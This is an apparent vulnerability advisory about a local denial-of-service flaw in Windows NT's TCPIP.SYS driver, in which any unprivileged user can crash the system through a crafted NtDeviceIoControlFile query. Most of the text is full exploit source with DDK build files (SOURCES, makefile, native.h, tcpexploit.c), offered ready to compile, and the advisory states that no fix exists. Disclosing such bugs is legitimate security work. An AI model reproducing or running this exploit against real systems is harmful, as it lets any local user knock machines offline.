COMMAND
TCPIP.SYS
SYSTEMS AFFECTED
Win NT systems
PROBLEM
Luigi Mori found following. Playing with TCPIP.SYS he noticed
that every user could crash the local system with a
IRQL_NOT_LESS_OR_EQUAL exception just calling the undocumented
function NtDeviceIoControlFile with an handle to TCPIP and the
"right" parameters. NtDeviceIoControlFile is the native
correspondent of DeviceIoControl and is called by InetMib1.dll
and WINSOCK Helper Dlls to retrieve TCPIP statistics thus no
special rights are needed to run the exploit. The bug resides in
TCPIP.SYS InternalIoControl dispatch routine where lacks a check
on current IRQL level before processing the query information
request. This is the exploit (you should compile it with DDK):
--------------- begin SOURCES ---------------------------
TARGETNAME= tcpinfo
TARGETPATH= .
TARGETTYPE= PROGRAM
INCLUDES= .; ..\; \DDK\inc;\DDK\src\network\inc
SOURCES= tcpinfo.c
UMTYPE= console
UMBASE= 0x400000
UMLIBS= \DDK\lib\i386\checked\ntdll.lib
--------------- end SOURCES -----------------------------
--------------- begin makefile --------------------------
#
# DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source
# file to this component. This file merely indirects to the real make file
# that is shared by all the driver components of the Windows NT DDK
#
!INCLUDE $(NTMAKEENV)\makefile.def
--------------- end makefile ----------------------------
--------------- begin native.h --------------------------
#ifndef gigi_native_h
#define gigi_native_h
typedef struct {
unsigned int bo;
unsigned int result;
HANDLE hevent;
} nt_overlapped;
#define IOCTL_TCP_QUERY_INFORMATION 0x120003
#endif /* gigi_native_h */
-------------- end native.h ----------------------------
-------------- begin tcpexploit.c ------------------------
#include
#include
#include
#include "native.h"
#define MAX_NAME_LEN 256
struct {
HANDLE h_tcp;
char buff[0x400];
} g;
unsigned int
open_tcp()
{
OBJECT_ATTRIBUTES object_attrs;
UNICODE_STRING device_tcp;
WCHAR device_tcp_buff[MAX_NAME_LEN];
IO_STATUS_BLOCK io_status_block;
NTSTATUS status;
device_tcp.Buffer = &device_tcp_buff;
RtlInitUnicodeString(&device_tcp, L"\\Device\\Tcp");
InitializeObjectAttributes(&object_attrs, &device_tcp,
OBJ_CASE_INSENSITIVE, NULL, NULL);
status = ZwCreateFile(&g.h_tcp, 0x20000000, &object_attrs,
&io_status_block, 0,
FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ|FILE_SHARE_WRITE,
FILE_OPEN_IF,
0, NULL, 0);
if(status != STATUS_SUCCESS) {
printf("ZwCreateFile error %#x %#x\n", status, io_status_block);
return 0;
}
return 1;
}
void
close_tcp()
{
ZwClose(g.h_tcp);
}
unsigned int
tcp_query_information(void *in_buff, unsigned int in_buff_len,
void *out_buff, unsigned int out_buff_len)
{
NTSTATUS status;
nt_overlapped prova;
unsigned int i, *p;
status = NtCreateEvent(&prova.hevent, 0x1F003, 0, 1, NULL);
if(status != STATUS_SUCCESS) {
printf("NtCreateEvent error 0x#x\n", status);
return 0;
}
status = NtDeviceIoControlFile(g.h_tcp, prova.hevent, 0, 0,
&prova, IOCTL_TCP_QUERY_INFORMATION, in_buff,
in_buff_len, out_buff, out_buff_len);
ZwClose(prova.hevent);
printf("%#X\n", status);
return 1;
}
void __cdecl
main()
{
struct tcp_request_query_information_ex in_buff;
if(!open_tcp()) {
return;
}
in_buff.ID.toi_entity.tei_entity = CO_TL_ENTITY;
in_buff.ID.toi_entity.tei_instance = 0;
in_buff.ID.toi_class = INFO_CLASS_PROTOCOL;
in_buff.ID.toi_type = INFO_TYPE_CONNECTION;
in_buff.ID.toi_id = 0x5;
if(!tcp_query_information(&in_buff, 0x24, g.buff, sizeof(g.buff))) {
return;
}
close_tcp();
}
----------------- end tcpexploit.c ---------------------------------
SOLUTION
Nothing yet.